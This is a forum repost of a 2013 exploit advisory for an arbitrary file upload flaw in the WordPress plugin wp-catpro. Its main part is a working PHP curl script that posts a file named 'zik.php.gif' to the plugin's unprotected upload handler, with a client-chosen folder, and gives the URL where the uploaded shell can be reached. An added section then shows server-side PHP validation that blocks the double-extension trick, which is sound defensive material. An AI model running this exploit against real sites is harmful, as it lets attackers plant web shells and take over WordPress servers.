China Network Penetration Testing Alliance

Title: WordPress plugin wp-catpro arbitrary file upload

Author: admin    Time: 2013-2-27 20:12
WordPress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7 , Backtrack 5r3
Download link : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php

$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>
<?php
phpinfo();
?>
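
The advisory shows the upload handler accepting `zik.php.gif` against an allow-list of jpg, gif and png, storing it with the `.php` segment still in its name, and taking the destination from a client-supplied `folder` field. The following is an added example, not the plugin's code or the advisory author's: a server-side check that keeps only the final extension, verifies the content, and generates the stored name itself. The function names, the destination handling and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's code. The allow-list is the one quoted in the advisory.
const ALLOWED = ['jpg' => IMAGETYPE_JPEG, 'gif' => IMAGETYPE_GIF, 'png' => IMAGETYPE_PNG];

// Returns the on-disk name for an upload, or null to reject it.
// $clientName is untrusted; $tmpPath is the uploaded temp file.
function stored_name_for_upload(string $clientName, string $tmpPath): ?string
{
    // The final extension is used only to pick an entry from the allow-list.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        return null;
    }
    // The bytes must parse as the image type the extension claims. This is not
    // sufficient alone: a file can carry a valid image header and script text.
    $info = @getimagesize($tmpPath);
    if ($info === false || $info[2] !== ALLOWED[$ext]) {
        return null;
    }
    // Discard the client's name. The stored name has exactly one extension,
    // so the ".php" segment of "zik.php.gif" never reaches the disk.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Hypothetical handler: $destDir is fixed server-side, never read from a "folder" field.
function handle_upload(array $file, string $destDir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    $name = stored_name_for_upload($file['name'], $file['tmp_name']);
    if ($name === null || !move_uploaded_file($file['tmp_name'], "$destDir/$name")) {
        return null;
    }
    return $name;
}

// Constructed samples: a 1x1 GIF, and script text with no image header.
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));
$txt = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($txt, '<?php phpinfo(); ?>');
foreach ([['photo.gif', $gif], ['zik.php.gif', $gif], ['zik.php.gif', $txt], ['zik.php', $gif]] as [$n, $p]) {
    printf("%-12s => %s\n", $n, stored_name_for_upload($n, $p) ?? 'rejected');
}
unlink($gif);
unlink($txt);
```

Serving the uploads directory with script execution disabled covers the case the content check cannot: a file that is both a valid image and script text.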



